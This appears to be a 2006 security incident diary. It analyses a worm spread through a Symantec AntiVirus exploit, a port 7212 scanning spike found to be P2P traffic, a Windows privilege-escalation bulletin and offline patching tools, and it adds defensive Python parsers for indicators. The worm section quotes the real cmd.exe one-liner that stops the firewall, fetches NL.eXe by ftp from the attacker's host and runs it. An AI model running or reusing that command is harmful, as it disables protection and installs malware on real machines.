SAV worm and its C&C
This file (NL.eXe, details below) was being downloaded by a large number of machines that had recently been exploited using the SAV remote exploit. The sequence of events for these compromises was:
Exploit comes in from IP address A (this IP varies).
Victim sends a Windows command prompt to 61.172.250.59 on tcp port 12345.
61.172.250.59 responds with the following:
cmd.exe /c "Net Stop SharedAccess&cd %TEMP%&echo open ftpd.3322.org 21211>x&echo test>>x&echo test>>x&echo bin>>x&echo get NL.eXe>>x&echo bye>>x&ftp.eXe -s:x&NL.eXe&del x"
This command stops the Windows Firewall/Internet Connection Sharing service (SharedAccess), changes to %TEMP%, and builds an ftp command script named "x" one echo at a time: open ftpd.3322.org on port 21211, answer the username and password prompts with "test" and "test", switch to binary mode, get NL.eXe, bye.
ftp.exe -s:x then feeds that script to the ftp client, which downloads NL.eXe (from ftpd.3322.org port 21211);
NL.eXe is executed and the script file x is deleted.
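As an added example (not code from the original diary), here is a small Python parser that pulls the indicators a responder wants out of that one-liner: it replays the "echo ...>x" / "echo ...>>x" redirections to rebuild the ftp script, then reads the script the way ftp.exe -s: does (the two lines after "open" answer the User and Password prompts). SAMPLE is the command quoted above; the parser assumes no escaped ampersands (^&), which this sample does not use.

```python
"""Extract indicators from the cmd.exe one-liner a SAV-exploited host received.

Added example, not from the original diary.  Rebuilds the ftp script from the
echo redirections and interprets it as ftp.exe -s: would.  Assumes the chained
commands are separated by a plain '&' (no ^& escapes), true for SAMPLE.
"""
import re

# The command quoted in the write-up, copied verbatim.
SAMPLE = ('cmd.exe /c "Net Stop SharedAccess&cd %TEMP%&echo open ftpd.3322.org 21211>x'
          '&echo test>>x&echo test>>x&echo bin>>x&echo get NL.eXe>>x&echo bye>>x'
          '&ftp.eXe -s:x&NL.eXe&del x"')


def split_cmd(cmdline):
    """Return the individual commands chained with '&' inside cmd.exe /c "..."."""
    m = re.search(r'/c\s+"(.*)"\s*$', cmdline, re.S)
    body = m.group(1) if m else cmdline
    return [c.strip() for c in body.split('&') if c.strip()]


def rebuild_echo_scripts(commands):
    """Replay 'echo TEXT>file' (truncate) and 'echo TEXT>>file' (append)
    and return {filename: file content} for every script written that way."""
    scripts = {}
    for cmd in commands:
        m = re.match(r'echo\s+(.*?)\s*(>>|>)\s*(\S+)$', cmd, re.I)
        if not m:
            continue
        text, op, fname = m.groups()
        if op == '>':
            scripts[fname] = []
        scripts.setdefault(fname, []).append(text)
    return {name: '\n'.join(lines) for name, lines in scripts.items()}


def parse_ftp_script(script):
    """Interpret an ftp.exe -s: script: 'open HOST [PORT]' is followed by the
    answers to the User and Password prompts, then ordinary ftp commands."""
    lines = [l for l in script.splitlines() if l.strip()]
    info = {'host': None, 'port': 21, 'user': None, 'password': None,
            'binary': False, 'files': []}
    i = 0
    while i < len(lines):
        parts = lines[i].split()
        verb = parts[0].lower()
        if verb == 'open':
            info['host'] = parts[1]
            if len(parts) > 2:
                info['port'] = int(parts[2])
            info['user'] = lines[i + 1] if i + 1 < len(lines) else None
            info['password'] = lines[i + 2] if i + 2 < len(lines) else None
            i += 3
            continue
        if verb in ('bin', 'binary'):
            info['binary'] = True
        elif verb == 'get' and len(parts) > 1:
            info['files'].append(parts[1])
        i += 1
    return info


def extract_iocs(cmdline):
    """Summarise the one-liner: services stopped, downloads (host, port,
    credentials, files), binaries launched and files cleaned up afterwards."""
    cmds = split_cmd(cmdline)
    scripts = rebuild_echo_scripts(cmds)
    iocs = {'services_stopped': [], 'downloads': [], 'executed': [], 'deleted': []}
    for c in cmds:
        ftp = re.match(r'ftp(\.exe)?\s+-s:(\S+)$', c, re.I)
        if re.match(r'net\s+stop\s+\S+', c, re.I):
            iocs['services_stopped'].append(c.split(None, 2)[2])
        elif ftp and ftp.group(2) in scripts:
            iocs['downloads'].append(parse_ftp_script(scripts[ftp.group(2)]))
        elif re.match(r'del\s+\S+$', c, re.I):
            iocs['deleted'].append(c.split(None, 1)[1])
        elif re.match(r'^\S+\.exe$', c, re.I):   # a bare 'NL.eXe' means: run it
            iocs['executed'].append(c)
    return iocs


if __name__ == '__main__':
    from pprint import pprint
    pprint(extract_iocs(SAMPLE))
```

The same approach works on any downloader one-liner built from echo/ftp -s, which was a common pattern at the time; the recovered host, port and filename are the indicators to block and to search proxy and IDS logs for.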
Running the file through Virustotal gave limited information.
Complete scanning result of "NL.eXe", received in VirusTotal at 12.14.2006, 18:15:47 (CET).
Engine          Version       Signatures   Result
BitDefender     7.2           12.14.2006   DeepScan:Generic.Malware.IBdld!g.C9552284
CAT-QuickHeal   8.00          12.14.2006   (Suspicious) - DNAScan
eSafe           7.0.14.0      12.14.2006   Win32.Polipos.sus
Fortinet        2.82.0.0      12.14.2006   suspicious
Ikarus          T3.1.0.26     12.14.2006   Trojan-Downloader.Win32.Zlob.and
Kaspersky       4.0.2.24      12.14.2006   no virus found
Norman          5.80.02       12.14.2006   W32/Suspicious_U.gen
Panda           9.0.0.4       12.13.2006   Suspicious file
Prevx1          V2            12.14.2006   Malicious
Sophos          4.12.0        12.14.2006   Mal/Behav-009
Sunbelt         2.2.907.0     11.30.2006   VIPRE.Suspicious
All others reported no virus found.
Additional information
File size: 12168 bytes
MD5: f538d2c73c7bc7ad084deb8429bd41ef
SHA1: 0eb52548a1c234cb2f8506a7c9a2e1a4547e9f8d
packers: UPACK
packers: embedded, UPack
Prevx info: http://fileinfo.prevx.com/fileinfo.asp?PXC=70e962776070
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.
John then reviewed his IDS logs looking for traffic on port 5202, which appears to be the command-and-control port for this malware, and discovered traffic towards 61.172.146.94.
We have requested that the C&C system and the malware distribution site be shut down.
I submitted nl.exe to Norman and here are the results:
nl.exe.virus : Not detected by Sandbox (Signature: W32/Suspicious_U.gen)
[ General information ]
* File length: 12168 bytes.
* MD5 hash: f538d2c73c7bc7ad084deb8429bd41ef.
[ Changes to filesystem ]
* Creates file C:\WINDOWS\SYSTEM32\wuauclt.dll.
* Creates file C:\WINDOWS\TEMP\NL055.bat.
[ Process/window information ]
* Enumerates running processes.
* Attemps to NULL C:\WINDOWS\TEMP\NL055.bat NULL.
[ Signature Scanning ]
* C:\WINDOWS\SYSTEM32\wuauclt.dll (23040 bytes) : no signature detection.
* C:\WINDOWS\TEMP\NL055.bat (102 bytes) : no signature detection.
(C) 2004-2006 Norman ASA. All Rights Reserved
We had one report, not yet verified, that this malware includes a keylogger.
Port 7212 spike
I checked our port statistics and found we had two spikes: one on the 14th of November and one on the 8th of December.
Nov 14th we saw 62k targets and 143k records with only 105 sources.
That is a 7x increase in records and a 15x increase in targets, while the number of sources went down from the previous day.
On Dec 8th we saw 76k records against 27k targets with only 88 sources.
That is a 3x increase in records and a 10x increase in targets, while the number of sources again went down from the previous day.
From the user comments on the SANS port statistics:
http://isc.sans.org/port_details.php?port=7212
"There are certain older versions of GhostSurf which fire up by default as a wide-open proxy,"
Lawrence Baldwin
Write-up on ghostsurf open proxy from November 23, 2005
http://www.tenebril.com/src/advisories/open-proxy-relay.php
But based on packets provided by Daniel F., it appears to be P2P-related.
Here is a write-up by Daniel, followed by the packet contents.
"Earlier today a significant increase of port 7212/TCP (unknown) scanning
against relatively large segments from networks in North America,
Sweden, and France was noted.
All probes analyzed thus far appear to be associated with a Peer-to-Peer
(P2P) application framework known as
"GnucDNA" (http://www.gnucleus.com/GnucDNA/).
-----------------------------
And two sanitized payloads:
GET /uri-res/N2R?urn:sha1:BJZCBU6KXKEWBY4MXFONNO3T6MYVF67H HTTP/1.1
Host: [targeted darknet address removed]:7212
User-Agent: Fildelarprogram 9.9.9.9 (GnucDNA 1.1.1.5)
Listen-IP: [.se host address removed]:17799
Connection: Keep-Alive
Range: bytes=0-524287
X-Queue: 0.1
X-Features: g2/1.0
Content-URN: urn:sha1:BJZCBU6KXKEWBY4MXFONNO3T6MYVF67H
GET /uri-res/N2R?urn:sha1:KONNXKWMSMHIJ7N63HLSPOHG7IPYVV25 HTTP/1.1
Host: [targeted darknet address removed]:7212
User-Agent: morph500 5.1.2.912 (GnucDNA 1.1.1.4)
Listen-IP: [.fr host address removed]:29168
Connection: Keep-Alive
Range: bytes=0-524287
X-Queue: 0.1
X-Features: g2/1.0
Content-URN: urn:sha1:KONNXKWMSMHIJ7N63HLSPOHG7IPYVV25"
So I did a Google search for GET /uri-res/N2R?urn:sha1 and, guess what, it's all BearShare, LimeWire and other P2P clients.
So this spike appears to be P2P-related, not open proxies. But the question on my mind is: why so few sources but so many targets?
After a review of the top source IPs it appears most of this is coming from within china.
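As an added example (not code from the diary or from Daniel's post), the following Python classifier tells a GnucDNA "N2R" download request of the kind quoted above apart from the absolute-URI or CONNECT requests an open-proxy scan would send. The two P2P requests are the sanitized payloads from Daniel's post with the removed addresses filled in using RFC 5737 documentation addresses; PROXY_PROBE is a constructed request included for contrast.

```python
"""Classify raw HTTP payloads captured on a darknet port (7212/tcp here).

Added example, not code from the diary.  REQ_SE and REQ_FR are the two
sanitized requests quoted in the write-up; the addresses the post removed
are replaced with RFC 5737 documentation addresses.  PROXY_PROBE is a
constructed open-proxy style request, added for contrast.
"""
import re

DARKNET_HOST = '192.0.2.10:7212'   # placeholder for the removed darknet target

REQ_SE = (
    'GET /uri-res/N2R?urn:sha1:BJZCBU6KXKEWBY4MXFONNO3T6MYVF67H HTTP/1.1\r\n'
    'Host: ' + DARKNET_HOST + '\r\n'
    'User-Agent: Fildelarprogram 9.9.9.9 (GnucDNA 1.1.1.5)\r\n'
    'Listen-IP: 198.51.100.7:17799\r\n'   # placeholder for the removed .se host
    'Connection: Keep-Alive\r\n'
    'Range: bytes=0-524287\r\n'
    'X-Queue: 0.1\r\n'
    'X-Features: g2/1.0\r\n'
    'Content-URN: urn:sha1:BJZCBU6KXKEWBY4MXFONNO3T6MYVF67H\r\n\r\n'
)
REQ_FR = (
    'GET /uri-res/N2R?urn:sha1:KONNXKWMSMHIJ7N63HLSPOHG7IPYVV25 HTTP/1.1\r\n'
    'Host: ' + DARKNET_HOST + '\r\n'
    'User-Agent: morph500 5.1.2.912 (GnucDNA 1.1.1.4)\r\n'
    'Listen-IP: 203.0.113.42:29168\r\n'   # placeholder for the removed .fr host
    'Connection: Keep-Alive\r\n'
    'Range: bytes=0-524287\r\n'
    'X-Queue: 0.1\r\n'
    'X-Features: g2/1.0\r\n'
    'Content-URN: urn:sha1:KONNXKWMSMHIJ7N63HLSPOHG7IPYVV25\r\n\r\n'
)
PROXY_PROBE = (   # constructed: what a wide-open proxy scan typically sends
    'GET http://www.example.com/ HTTP/1.1\r\n'
    'Host: www.example.com\r\n'
    'User-Agent: proxycheck\r\n\r\n'
)

# Gnutella/G2 request for a file by its SHA-1 (base32, always 32 characters).
N2R_RE = re.compile(r'^GET /uri-res/N2R\?urn:sha1:([A-Z2-7]{32}) HTTP/1\.[01]$')
# Proxy probes use an absolute URI or a CONNECT host:port in the request line.
PROXY_RE = re.compile(r'^(?:GET|POST) https?://\S+ HTTP/1\.[01]$'
                      r'|^CONNECT \S+:\d+ HTTP/1\.[01]$')


def parse_request(payload):
    """Split a raw HTTP request into (request line, {lower-case header: value})."""
    head = payload.split('\r\n\r\n', 1)[0]
    lines = head.split('\r\n')
    headers = {}
    for line in lines[1:]:
        if ':' in line:
            name, value = line.split(':', 1)
            headers[name.strip().lower()] = value.strip()
    return lines[0].strip(), headers


def classify(payload):
    """Label one payload as 'p2p-n2r', 'proxy-probe' or 'other' and, for P2P
    requests, extract the hash requested, the client library and the listening
    endpoint the peer advertises in Listen-IP."""
    request_line, headers = parse_request(payload)
    result = {'kind': 'other', 'request_line': request_line}
    m = N2R_RE.match(request_line)
    if m:
        ua = headers.get('user-agent', '')
        lib = re.search(r'\((GnucDNA [\d.]+)\)', ua)
        result.update(
            kind='p2p-n2r',
            sha1=m.group(1),
            user_agent=ua,
            gnucdna=lib.group(1) if lib else None,
            listen_ip=headers.get('listen-ip'),
            g2='g2/1.0' in headers.get('x-features', ''),
            # the Content-URN header should name the same hash as the request line
            urn_consistent=headers.get('content-urn') == 'urn:sha1:' + m.group(1),
        )
    elif PROXY_RE.match(request_line):
        result['kind'] = 'proxy-probe'
    return result


def summarize(payloads):
    """Count request kinds and GnucDNA versions over a batch of captures."""
    kinds, versions = {}, {}
    for p in payloads:
        r = classify(p)
        kinds[r['kind']] = kinds.get(r['kind'], 0) + 1
        if r.get('gnucdna'):
            versions[r['gnucdna']] = versions.get(r['gnucdna'], 0) + 1
    return kinds, versions


if __name__ == '__main__':
    print(summarize([REQ_SE, REQ_FR, PROXY_PROBE]))
```

Run over a darknet capture, the version and Listen-IP tallies from summarize and classify give a quick answer to the open-proxy versus P2P question without grepping each payload by hand.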
MS06-075: csrss local privilege escalation (CVE-2006-5585)
We rate this one as important. If someone can already get access to the system via other means (a cracked password, etc.), this vulnerability allows that person to elevate their privileges to administrator by running a specially crafted executable.
References:
KB926255
CVE-2006-5585
Offline Microsoft Patching
Heise brings us "Offline Update 3.0" to do offline installations of Microsoft patches.
Read more about it at: http://www.heise-security.co.uk/articles/80682
Now this is a great concept. You can make a DVD to install the patches before you connect a PC that is out of date on patches to the Internet. If you think you can safely do that without this tool, take a second and think it through: some of your friends needing a house call might have a USB-connected DSL or cable modem and therefore no NAT in front of the machine. Then take a look at the survival time and think how long it takes to get a Windows system from original media to fully patched status.
So, if you're going to visit parents, family or friends over the holidays, start your preparation now and make that disk today to take along. It'll improve the obligatory "Could you take a look at our computer while you're here?" response time dramatically and gives you a safe way to reinstall systems without a hardware-based firewall.
If you have networks that you do not want to connect to the Internet because the risks of doing so are too big for the sensitivity of the data involved, this might also become a way to patch those off-line machines.
Update: Simon wrote in mentioning AutoPatcher as an alternative solution.
Update: "Mads" reminded us Microsoft makes available ISO images with some of the patches on a monthly basis.
--
Swa Frantzen -- Section 66
/dev/random
Some major data breaches announced at UCLA and Boeing bring the running total of records exposed in the breaches tracked at privacyrights.org since April 2005 to almost 100 million. http://www.privacyrights.org/ar/ChronDataBreaches.htm
New vulnerabilities announced in Symantec NetBackup: http://www.symantec.com/avcenter/security/Content/2006.12.13a.html